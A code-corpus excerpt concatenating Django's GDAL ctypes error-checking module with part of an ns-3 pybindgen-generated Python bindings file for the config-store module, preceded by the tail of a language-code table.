LanguageCodes["zul"] = LanguageCodes["zu"] = ("Zulu", "Negro-african")
LanguageCodes["zun"] = ("Zuni", "")
| gpl-2.0 |
marcelocure/django | django/contrib/gis/gdal/prototypes/errcheck.py | 586 | 4229 | """
This module houses the error-checking routines used by the GDAL
ctypes prototypes.
"""
from ctypes import c_void_p, string_at
from django.contrib.gis.gdal.error import (
GDALException, SRSException, check_err,
)
from django.contrib.gis.gdal.libgdal import lgdal
from django.utils import six
# Helper routines for retrieving pointers and/or values from
# arguments passed in by reference.
def arg_byref(args, offset=-1):
"Returns the pointer argument's by-reference value."
return args[offset]._obj.value
def ptr_byref(args, offset=-1):
"Returns the pointer argument passed in by-reference."
return args[offset]._obj
# ### String checking Routines ###
def check_const_string(result, func, cargs, offset=None, cpl=False):
"""
Similar functionality to `check_string`, but does not free the pointer.
"""
if offset:
check_err(result, cpl=cpl)
ptr = ptr_byref(cargs, offset)
return ptr.value
else:
return result
def check_string(result, func, cargs, offset=-1, str_result=False):
"""
Checks the string output returned from the given function, and frees
the string pointer allocated by OGR. The `str_result` keyword
may be used when the result is the string pointer, otherwise
the OGR error code is assumed. The `offset` keyword may be used
to extract the string pointer passed in by-reference at the given
slice offset in the function arguments.
"""
if str_result:
# For routines that return a string.
ptr = result
if not ptr:
s = None
else:
s = string_at(result)
else:
# Error-code return specified.
check_err(result)
ptr = ptr_byref(cargs, offset)
# Getting the string value
s = ptr.value
# Correctly freeing the allocated memory behind GDAL pointer
# with the VSIFree routine.
if ptr:
lgdal.VSIFree(ptr)
return s
# ### DataSource, Layer error-checking ###
# ### Envelope checking ###
def check_envelope(result, func, cargs, offset=-1):
"Checks a function that returns an OGR Envelope by reference."
env = ptr_byref(cargs, offset)
return env
# ### Geometry error-checking routines ###
def check_geom(result, func, cargs):
"Checks a function that returns a geometry."
# OGR_G_Clone may return an integer, even though the
# restype is set to c_void_p
if isinstance(result, six.integer_types):
result = c_void_p(result)
if not result:
raise GDALException('Invalid geometry pointer returned from "%s".' % func.__name__)
return result
def check_geom_offset(result, func, cargs, offset=-1):
"Chcks the geometry at the given offset in the C parameter list."
check_err(result)
geom = ptr_byref(cargs, offset=offset)
return check_geom(geom, func, cargs)
# ### Spatial Reference error-checking routines ###
def check_srs(result, func, cargs):
if isinstance(result, six.integer_types):
result = c_void_p(result)
if not result:
raise SRSException('Invalid spatial reference pointer returned from "%s".' % func.__name__)
return result
# ### Other error-checking routines ###
def check_arg_errcode(result, func, cargs, cpl=False):
"""
The error code is returned in the last argument, by reference.
Check its value with `check_err` before returning the result.
"""
check_err(arg_byref(cargs), cpl=cpl)
return result
def check_errcode(result, func, cargs, cpl=False):
"""
Check the error code returned (c_int).
"""
check_err(result, cpl=cpl)
def check_pointer(result, func, cargs):
"Makes sure the result pointer is valid."
if isinstance(result, six.integer_types):
result = c_void_p(result)
if result:
return result
else:
raise GDALException('Invalid pointer returned from "%s"' % func.__name__)
def check_str_arg(result, func, cargs):
"""
This is for the OSRGet[Angular|Linear]Units functions, which
require that the returned string pointer not be freed. This
returns both the double and string values.
"""
dbl = result
ptr = cargs[-1]._obj
return dbl, ptr.value.decode()
| bsd-3-clause |
sergiosvieira/ns3-dtn | src/config-store/bindings/modulegen__gcc_LP64.py | 34 | 54509 | from pybindgen import Module, FileCodeSink, param, retval, cppclass, typehandlers
import pybindgen.settings
import warnings
class ErrorHandler(pybindgen.settings.ErrorHandler):
def handle_error(self, wrapper, exception, traceback_):
warnings.warn("exception %r in wrapper %s" % (exception, wrapper))
return True
pybindgen.settings.error_handler = ErrorHandler()
import sys
def module_init():
root_module = Module('ns.config_store', cpp_namespace='::ns3')
return root_module
def register_types(module):
root_module = module.get_root()
## callback.h (module 'core'): ns3::CallbackBase [class]
module.add_class('CallbackBase', import_from_module='ns.core')
## file-config.h (module 'config-store'): ns3::FileConfig [class]
module.add_class('FileConfig', allow_subclassing=True)
## gtk-config-store.h (module 'config-store'): ns3::GtkConfigStore [class]
module.add_class('GtkConfigStore')
## file-config.h (module 'config-store'): ns3::NoneFileConfig [class]
module.add_class('NoneFileConfig', parent=root_module['ns3::FileConfig'])
## object-base.h (module 'core'): ns3::ObjectBase [class]
module.add_class('ObjectBase', allow_subclassing=True, import_from_module='ns.core')
## type-id.h (module 'core'): ns3::TypeId [class]
module.add_class('TypeId', import_from_module='ns.core')
## type-id.h (module 'core'): ns3::TypeId::AttributeFlag [enumeration]
module.add_enum('AttributeFlag', ['ATTR_GET', 'ATTR_SET', 'ATTR_CONSTRUCT', 'ATTR_SGC'], outer_class=root_module['ns3::TypeId'], import_from_module='ns.core')
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation [struct]
module.add_class('AttributeInformation', import_from_module='ns.core', outer_class=root_module['ns3::TypeId'])
## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation [struct]
module.add_class('TraceSourceInformation', import_from_module='ns.core', outer_class=root_module['ns3::TypeId'])
## empty.h (module 'core'): ns3::empty [class]
module.add_class('empty', import_from_module='ns.core')
## config-store.h (module 'config-store'): ns3::ConfigStore [class]
module.add_class('ConfigStore', parent=root_module['ns3::ObjectBase'])
## config-store.h (module 'config-store'): ns3::ConfigStore::Mode [enumeration]
module.add_enum('Mode', ['LOAD', 'SAVE', 'NONE'], outer_class=root_module['ns3::ConfigStore'])
## config-store.h (module 'config-store'): ns3::ConfigStore::FileFormat [enumeration]
module.add_enum('FileFormat', ['XML', 'RAW_TEXT'], outer_class=root_module['ns3::ConfigStore'])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> > [class]
module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::AttributeAccessor', 'ns3::empty', 'ns3::DefaultDeleter<ns3::AttributeAccessor>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> > [class]
module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::AttributeChecker', 'ns3::empty', 'ns3::DefaultDeleter<ns3::AttributeChecker>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> > [class]
module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::AttributeValue', 'ns3::empty', 'ns3::DefaultDeleter<ns3::AttributeValue>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> > [class]
module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::CallbackImplBase', 'ns3::empty', 'ns3::DefaultDeleter<ns3::CallbackImplBase>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> > [class]
module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::TraceSourceAccessor', 'ns3::empty', 'ns3::DefaultDeleter<ns3::TraceSourceAccessor>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
## trace-source-accessor.h (module 'core'): ns3::TraceSourceAccessor [class]
module.add_class('TraceSourceAccessor', import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> >'])
## attribute.h (module 'core'): ns3::AttributeAccessor [class]
module.add_class('AttributeAccessor', import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> >'])
## attribute.h (module 'core'): ns3::AttributeChecker [class]
module.add_class('AttributeChecker', allow_subclassing=False, automatic_type_narrowing=True, import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> >'])
## attribute.h (module 'core'): ns3::AttributeValue [class]
module.add_class('AttributeValue', allow_subclassing=False, automatic_type_narrowing=True, import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> >'])
## callback.h (module 'core'): ns3::CallbackChecker [class]
module.add_class('CallbackChecker', import_from_module='ns.core', parent=root_module['ns3::AttributeChecker'])
## callback.h (module 'core'): ns3::CallbackImplBase [class]
module.add_class('CallbackImplBase', import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> >'])
## callback.h (module 'core'): ns3::CallbackValue [class]
module.add_class('CallbackValue', import_from_module='ns.core', parent=root_module['ns3::AttributeValue'])
## attribute.h (module 'core'): ns3::EmptyAttributeValue [class]
module.add_class('EmptyAttributeValue', import_from_module='ns.core', parent=root_module['ns3::AttributeValue'])
## type-id.h (module 'core'): ns3::TypeIdChecker [class]
module.add_class('TypeIdChecker', import_from_module='ns.core', parent=root_module['ns3::AttributeChecker'])
## type-id.h (module 'core'): ns3::TypeIdValue [class]
module.add_class('TypeIdValue', import_from_module='ns.core', parent=root_module['ns3::AttributeValue'])
## Register a nested module for the namespace FatalImpl
nested_module = module.add_cpp_namespace('FatalImpl')
register_types_ns3_FatalImpl(nested_module)
def register_types_ns3_FatalImpl(module):
root_module = module.get_root()
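# A hedged mini-example (not part of the generated file): the same
# pybindgen primitives used throughout this module, applied to a toy
# class. The header and C++ names are assumptions for illustration.
def _example_pybindgen_usage():
    """Sketch under stated assumptions: how add_class/add_method compose
    outside of a generated file like this one."""
    import pybindgen
    mod = pybindgen.Module('toy')
    mod.add_include('"toy.h"')            # assumed C++ header
    klass = mod.add_class('Counter')      # assumed C++ class
    klass.add_constructor([])
    klass.add_method('Increment', 'void', [])
    klass.add_method('Value', retval('int'), [], is_const=True)
    return mod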
def register_methods(root_module):
register_Ns3CallbackBase_methods(root_module, root_module['ns3::CallbackBase'])
register_Ns3FileConfig_methods(root_module, root_module['ns3::FileConfig'])
register_Ns3GtkConfigStore_methods(root_module, root_module['ns3::GtkConfigStore'])
register_Ns3NoneFileConfig_methods(root_module, root_module['ns3::NoneFileConfig'])
register_Ns3ObjectBase_methods(root_module, root_module['ns3::ObjectBase'])
register_Ns3TypeId_methods(root_module, root_module['ns3::TypeId'])
register_Ns3TypeIdAttributeInformation_methods(root_module, root_module['ns3::TypeId::AttributeInformation'])
register_Ns3TypeIdTraceSourceInformation_methods(root_module, root_module['ns3::TypeId::TraceSourceInformation'])
register_Ns3Empty_methods(root_module, root_module['ns3::empty'])
register_Ns3ConfigStore_methods(root_module, root_module['ns3::ConfigStore'])
register_Ns3SimpleRefCount__Ns3AttributeAccessor_Ns3Empty_Ns3DefaultDeleter__lt__ns3AttributeAccessor__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> >'])
register_Ns3SimpleRefCount__Ns3AttributeChecker_Ns3Empty_Ns3DefaultDeleter__lt__ns3AttributeChecker__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> >'])
register_Ns3SimpleRefCount__Ns3AttributeValue_Ns3Empty_Ns3DefaultDeleter__lt__ns3AttributeValue__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> >'])
register_Ns3SimpleRefCount__Ns3CallbackImplBase_Ns3Empty_Ns3DefaultDeleter__lt__ns3CallbackImplBase__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> >'])
register_Ns3SimpleRefCount__Ns3TraceSourceAccessor_Ns3Empty_Ns3DefaultDeleter__lt__ns3TraceSourceAccessor__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> >'])
register_Ns3TraceSourceAccessor_methods(root_module, root_module['ns3::TraceSourceAccessor'])
register_Ns3AttributeAccessor_methods(root_module, root_module['ns3::AttributeAccessor'])
register_Ns3AttributeChecker_methods(root_module, root_module['ns3::AttributeChecker'])
register_Ns3AttributeValue_methods(root_module, root_module['ns3::AttributeValue'])
register_Ns3CallbackChecker_methods(root_module, root_module['ns3::CallbackChecker'])
register_Ns3CallbackImplBase_methods(root_module, root_module['ns3::CallbackImplBase'])
register_Ns3CallbackValue_methods(root_module, root_module['ns3::CallbackValue'])
register_Ns3EmptyAttributeValue_methods(root_module, root_module['ns3::EmptyAttributeValue'])
register_Ns3TypeIdChecker_methods(root_module, root_module['ns3::TypeIdChecker'])
register_Ns3TypeIdValue_methods(root_module, root_module['ns3::TypeIdValue'])
return
def register_Ns3CallbackBase_methods(root_module, cls):
## callback.h (module 'core'): ns3::CallbackBase::CallbackBase(ns3::CallbackBase const & arg0) [copy constructor]
cls.add_constructor([param('ns3::CallbackBase const &', 'arg0')])
## callback.h (module 'core'): ns3::CallbackBase::CallbackBase() [constructor]
cls.add_constructor([])
## callback.h (module 'core'): ns3::Ptr<ns3::CallbackImplBase> ns3::CallbackBase::GetImpl() const [member function]
cls.add_method('GetImpl',
'ns3::Ptr< ns3::CallbackImplBase >',
[],
is_const=True)
## callback.h (module 'core'): ns3::CallbackBase::CallbackBase(ns3::Ptr<ns3::CallbackImplBase> impl) [constructor]
cls.add_constructor([param('ns3::Ptr< ns3::CallbackImplBase >', 'impl')],
visibility='protected')
## callback.h (module 'core'): static std::string ns3::CallbackBase::Demangle(std::string const & mangled) [member function]
cls.add_method('Demangle',
'std::string',
[param('std::string const &', 'mangled')],
is_static=True, visibility='protected')
return
def register_Ns3FileConfig_methods(root_module, cls):
## file-config.h (module 'config-store'): ns3::FileConfig::FileConfig() [constructor]
cls.add_constructor([])
## file-config.h (module 'config-store'): ns3::FileConfig::FileConfig(ns3::FileConfig const & arg0) [copy constructor]
cls.add_constructor([param('ns3::FileConfig const &', 'arg0')])
## file-config.h (module 'config-store'): void ns3::FileConfig::Attributes() [member function]
cls.add_method('Attributes',
'void',
[],
is_pure_virtual=True, is_virtual=True)
## file-config.h (module 'config-store'): void ns3::FileConfig::Default() [member function]
cls.add_method('Default',
'void',
[],
is_pure_virtual=True, is_virtual=True)
## file-config.h (module 'config-store'): void ns3::FileConfig::Global() [member function]
cls.add_method('Global',
'void',
[],
is_pure_virtual=True, is_virtual=True)
## file-config.h (module 'config-store'): void ns3::FileConfig::SetFilename(std::string filename) [member function]
cls.add_method('SetFilename',
'void',
[param('std::string', 'filename')],
is_pure_virtual=True, is_virtual=True)
return
def register_Ns3GtkConfigStore_methods(root_module, cls):
## gtk-config-store.h (module 'config-store'): ns3::GtkConfigStore::GtkConfigStore(ns3::GtkConfigStore const & arg0) [copy constructor]
cls.add_constructor([param('ns3::GtkConfigStore const &', 'arg0')])
## gtk-config-store.h (module 'config-store'): ns3::GtkConfigStore::GtkConfigStore() [constructor]
cls.add_constructor([])
## gtk-config-store.h (module 'config-store'): void ns3::GtkConfigStore::ConfigureAttributes() [member function]
cls.add_method('ConfigureAttributes',
'void',
[])
## gtk-config-store.h (module 'config-store'): void ns3::GtkConfigStore::ConfigureDefaults() [member function]
cls.add_method('ConfigureDefaults',
'void',
[])
return
def register_Ns3NoneFileConfig_methods(root_module, cls):
## file-config.h (module 'config-store'): ns3::NoneFileConfig::NoneFileConfig(ns3::NoneFileConfig const & arg0) [copy constructor]
cls.add_constructor([param('ns3::NoneFileConfig const &', 'arg0')])
## file-config.h (module 'config-store'): ns3::NoneFileConfig::NoneFileConfig() [constructor]
cls.add_constructor([])
## file-config.h (module 'config-store'): void ns3::NoneFileConfig::Attributes() [member function]
cls.add_method('Attributes',
'void',
[],
is_virtual=True)
## file-config.h (module 'config-store'): void ns3::NoneFileConfig::Default() [member function]
cls.add_method('Default',
'void',
[],
is_virtual=True)
## file-config.h (module 'config-store'): void ns3::NoneFileConfig::Global() [member function]
cls.add_method('Global',
'void',
[],
is_virtual=True)
## file-config.h (module 'config-store'): void ns3::NoneFileConfig::SetFilename(std::string filename) [member function]
cls.add_method('SetFilename',
'void',
[param('std::string', 'filename')],
is_virtual=True)
return
def register_Ns3ObjectBase_methods(root_module, cls):
## object-base.h (module 'core'): ns3::ObjectBase::ObjectBase() [constructor]
cls.add_constructor([])
## object-base.h (module 'core'): ns3::ObjectBase::ObjectBase(ns3::ObjectBase const & arg0) [copy constructor]
cls.add_constructor([param('ns3::ObjectBase const &', 'arg0')])
## object-base.h (module 'core'): void ns3::ObjectBase::GetAttribute(std::string name, ns3::AttributeValue & value) const [member function]
cls.add_method('GetAttribute',
'void',
[param('std::string', 'name'), param('ns3::AttributeValue &', 'value')],
is_const=True)
## object-base.h (module 'core'): bool ns3::ObjectBase::GetAttributeFailSafe(std::string name, ns3::AttributeValue & attribute) const [member function]
cls.add_method('GetAttributeFailSafe',
'bool',
[param('std::string', 'name'), param('ns3::AttributeValue &', 'attribute')],
is_const=True)
## object-base.h (module 'core'): ns3::TypeId ns3::ObjectBase::GetInstanceTypeId() const [member function]
cls.add_method('GetInstanceTypeId',
'ns3::TypeId',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## object-base.h (module 'core'): static ns3::TypeId ns3::ObjectBase::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## object-base.h (module 'core'): void ns3::ObjectBase::SetAttribute(std::string name, ns3::AttributeValue const & value) [member function]
cls.add_method('SetAttribute',
'void',
[param('std::string', 'name'), param('ns3::AttributeValue const &', 'value')])
## object-base.h (module 'core'): bool ns3::ObjectBase::SetAttributeFailSafe(std::string name, ns3::AttributeValue const & value) [member function]
cls.add_method('SetAttributeFailSafe',
'bool',
[param('std::string', 'name'), param('ns3::AttributeValue const &', 'value')])
## object-base.h (module 'core'): bool ns3::ObjectBase::TraceConnect(std::string name, std::string context, ns3::CallbackBase const & cb) [member function]
cls.add_method('TraceConnect',
'bool',
[param('std::string', 'name'), param('std::string', 'context'), param('ns3::CallbackBase const &', 'cb')])
## object-base.h (module 'core'): bool ns3::ObjectBase::TraceConnectWithoutContext(std::string name, ns3::CallbackBase const & cb) [member function]
cls.add_method('TraceConnectWithoutContext',
'bool',
[param('std::string', 'name'), param('ns3::CallbackBase const &', 'cb')])
## object-base.h (module 'core'): bool ns3::ObjectBase::TraceDisconnect(std::string name, std::string context, ns3::CallbackBase const & cb) [member function]
cls.add_method('TraceDisconnect',
'bool',
[param('std::string', 'name'), param('std::string', 'context'), param('ns3::CallbackBase const &', 'cb')])
## object-base.h (module 'core'): bool ns3::ObjectBase::TraceDisconnectWithoutContext(std::string name, ns3::CallbackBase const & cb) [member function]
cls.add_method('TraceDisconnectWithoutContext',
'bool',
[param('std::string', 'name'), param('ns3::CallbackBase const &', 'cb')])
## object-base.h (module 'core'): void ns3::ObjectBase::ConstructSelf(ns3::AttributeConstructionList const & attributes) [member function]
cls.add_method('ConstructSelf',
'void',
[param('ns3::AttributeConstructionList const &', 'attributes')],
visibility='protected')
## object-base.h (module 'core'): void ns3::ObjectBase::NotifyConstructionCompleted() [member function]
cls.add_method('NotifyConstructionCompleted',
'void',
[],
visibility='protected', is_virtual=True)
return
def register_Ns3TypeId_methods(root_module, cls):
cls.add_binary_comparison_operator('<')
cls.add_binary_comparison_operator('!=')
cls.add_output_stream_operator()
cls.add_binary_comparison_operator('==')
## type-id.h (module 'core'): ns3::TypeId::TypeId(char const * name) [constructor]
cls.add_constructor([param('char const *', 'name')])
## type-id.h (module 'core'): ns3::TypeId::TypeId() [constructor]
cls.add_constructor([])
## type-id.h (module 'core'): ns3::TypeId::TypeId(ns3::TypeId const & o) [copy constructor]
cls.add_constructor([param('ns3::TypeId const &', 'o')])
## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::AddAttribute(std::string name, std::string help, ns3::AttributeValue const & initialValue, ns3::Ptr<ns3::AttributeAccessor const> accessor, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('AddAttribute',
'ns3::TypeId',
[param('std::string', 'name'), param('std::string', 'help'), param('ns3::AttributeValue const &', 'initialValue'), param('ns3::Ptr< ns3::AttributeAccessor const >', 'accessor'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')])
## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::AddAttribute(std::string name, std::string help, uint32_t flags, ns3::AttributeValue const & initialValue, ns3::Ptr<ns3::AttributeAccessor const> accessor, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('AddAttribute',
'ns3::TypeId',
[param('std::string', 'name'), param('std::string', 'help'), param('uint32_t', 'flags'), param('ns3::AttributeValue const &', 'initialValue'), param('ns3::Ptr< ns3::AttributeAccessor const >', 'accessor'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')])
## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::AddTraceSource(std::string name, std::string help, ns3::Ptr<ns3::TraceSourceAccessor const> accessor) [member function]
cls.add_method('AddTraceSource',
'ns3::TypeId',
[param('std::string', 'name'), param('std::string', 'help'), param('ns3::Ptr< ns3::TraceSourceAccessor const >', 'accessor')])
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation ns3::TypeId::GetAttribute(uint32_t i) const [member function]
cls.add_method('GetAttribute',
'ns3::TypeId::AttributeInformation',
[param('uint32_t', 'i')],
is_const=True)
## type-id.h (module 'core'): std::string ns3::TypeId::GetAttributeFullName(uint32_t i) const [member function]
cls.add_method('GetAttributeFullName',
'std::string',
[param('uint32_t', 'i')],
is_const=True)
## type-id.h (module 'core'): uint32_t ns3::TypeId::GetAttributeN() const [member function]
cls.add_method('GetAttributeN',
'uint32_t',
[],
is_const=True)
## type-id.h (module 'core'): ns3::Callback<ns3::ObjectBase*,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty> ns3::TypeId::GetConstructor() const [member function]
cls.add_method('GetConstructor',
'ns3::Callback< ns3::ObjectBase *, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >',
[],
is_const=True)
## type-id.h (module 'core'): std::string ns3::TypeId::GetGroupName() const [member function]
cls.add_method('GetGroupName',
'std::string',
[],
is_const=True)
## type-id.h (module 'core'): std::string ns3::TypeId::GetName() const [member function]
cls.add_method('GetName',
'std::string',
[],
is_const=True)
## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::GetParent() const [member function]
cls.add_method('GetParent',
'ns3::TypeId',
[],
is_const=True)
## type-id.h (module 'core'): static ns3::TypeId ns3::TypeId::GetRegistered(uint32_t i) [member function]
cls.add_method('GetRegistered',
'ns3::TypeId',
[param('uint32_t', 'i')],
is_static=True)
## type-id.h (module 'core'): static uint32_t ns3::TypeId::GetRegisteredN() [member function]
cls.add_method('GetRegisteredN',
'uint32_t',
[],
is_static=True)
## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation ns3::TypeId::GetTraceSource(uint32_t i) const [member function]
cls.add_method('GetTraceSource',
'ns3::TypeId::TraceSourceInformation',
[param('uint32_t', 'i')],
is_const=True)
## type-id.h (module 'core'): uint32_t ns3::TypeId::GetTraceSourceN() const [member function]
cls.add_method('GetTraceSourceN',
'uint32_t',
[],
is_const=True)
## type-id.h (module 'core'): uint16_t ns3::TypeId::GetUid() const [member function]
cls.add_method('GetUid',
'uint16_t',
[],
is_const=True)
## type-id.h (module 'core'): bool ns3::TypeId::HasConstructor() const [member function]
cls.add_method('HasConstructor',
'bool',
[],
is_const=True)
## type-id.h (module 'core'): bool ns3::TypeId::HasParent() const [member function]
cls.add_method('HasParent',
'bool',
[],
is_const=True)
## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::HideFromDocumentation() [member function]
cls.add_method('HideFromDocumentation',
'ns3::TypeId',
[])
## type-id.h (module 'core'): bool ns3::TypeId::IsChildOf(ns3::TypeId other) const [member function]
cls.add_method('IsChildOf',
'bool',
[param('ns3::TypeId', 'other')],
is_const=True)
## type-id.h (module 'core'): bool ns3::TypeId::LookupAttributeByName(std::string name, ns3::TypeId::AttributeInformation * info) const [member function]
cls.add_method('LookupAttributeByName',
'bool',
[param('std::string', 'name'), param('ns3::TypeId::AttributeInformation *', 'info')],
is_const=True)
## type-id.h (module 'core'): static ns3::TypeId ns3::TypeId::LookupByName(std::string name) [member function]
cls.add_method('LookupByName',
'ns3::TypeId',
[param('std::string', 'name')],
is_static=True)
## type-id.h (module 'core'): ns3::Ptr<ns3::TraceSourceAccessor const> ns3::TypeId::LookupTraceSourceByName(std::string name) const [member function]
cls.add_method('LookupTraceSourceByName',
'ns3::Ptr< ns3::TraceSourceAccessor const >',
[param('std::string', 'name')],
is_const=True)
## type-id.h (module 'core'): bool ns3::TypeId::MustHideFromDocumentation() const [member function]
cls.add_method('MustHideFromDocumentation',
'bool',
[],
is_const=True)
## type-id.h (module 'core'): bool ns3::TypeId::SetAttributeInitialValue(uint32_t i, ns3::Ptr<ns3::AttributeValue const> initialValue) [member function]
cls.add_method('SetAttributeInitialValue',
'bool',
[param('uint32_t', 'i'), param('ns3::Ptr< ns3::AttributeValue const >', 'initialValue')])
## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::SetGroupName(std::string groupName) [member function]
cls.add_method('SetGroupName',
'ns3::TypeId',
[param('std::string', 'groupName')])
## type-id.h (module 'core'): ns3::TypeId ns3::TypeId::SetParent(ns3::TypeId tid) [member function]
cls.add_method('SetParent',
'ns3::TypeId',
[param('ns3::TypeId', 'tid')])
## type-id.h (module 'core'): void ns3::TypeId::SetUid(uint16_t tid) [member function]
cls.add_method('SetUid',
'void',
[param('uint16_t', 'tid')])
return
def register_Ns3TypeIdAttributeInformation_methods(root_module, cls):
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::AttributeInformation() [constructor]
cls.add_constructor([])
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::AttributeInformation(ns3::TypeId::AttributeInformation const & arg0) [copy constructor]
cls.add_constructor([param('ns3::TypeId::AttributeInformation const &', 'arg0')])
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::accessor [variable]
cls.add_instance_attribute('accessor', 'ns3::Ptr< ns3::AttributeAccessor const >', is_const=False)
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::checker [variable]
cls.add_instance_attribute('checker', 'ns3::Ptr< ns3::AttributeChecker const >', is_const=False)
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::flags [variable]
cls.add_instance_attribute('flags', 'uint32_t', is_const=False)
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::help [variable]
cls.add_instance_attribute('help', 'std::string', is_const=False)
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::initialValue [variable]
cls.add_instance_attribute('initialValue', 'ns3::Ptr< ns3::AttributeValue const >', is_const=False)
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::name [variable]
cls.add_instance_attribute('name', 'std::string', is_const=False)
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation::originalInitialValue [variable]
cls.add_instance_attribute('originalInitialValue', 'ns3::Ptr< ns3::AttributeValue const >', is_const=False)
return
def register_Ns3TypeIdTraceSourceInformation_methods(root_module, cls):
## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation::TraceSourceInformation() [constructor]
cls.add_constructor([])
## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation::TraceSourceInformation(ns3::TypeId::TraceSourceInformation const & arg0) [copy constructor]
cls.add_constructor([param('ns3::TypeId::TraceSourceInformation const &', 'arg0')])
## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation::accessor [variable]
cls.add_instance_attribute('accessor', 'ns3::Ptr< ns3::TraceSourceAccessor const >', is_const=False)
## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation::help [variable]
cls.add_instance_attribute('help', 'std::string', is_const=False)
## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation::name [variable]
cls.add_instance_attribute('name', 'std::string', is_const=False)
return
def register_Ns3Empty_methods(root_module, cls):
## empty.h (module 'core'): ns3::empty::empty() [constructor]
cls.add_constructor([])
## empty.h (module 'core'): ns3::empty::empty(ns3::empty const & arg0) [copy constructor]
cls.add_constructor([param('ns3::empty const &', 'arg0')])
return
def register_Ns3ConfigStore_methods(root_module, cls):
## config-store.h (module 'config-store'): ns3::ConfigStore::ConfigStore(ns3::ConfigStore const & arg0) [copy constructor]
cls.add_constructor([param('ns3::ConfigStore const &', 'arg0')])
## config-store.h (module 'config-store'): ns3::ConfigStore::ConfigStore() [constructor]
cls.add_constructor([])
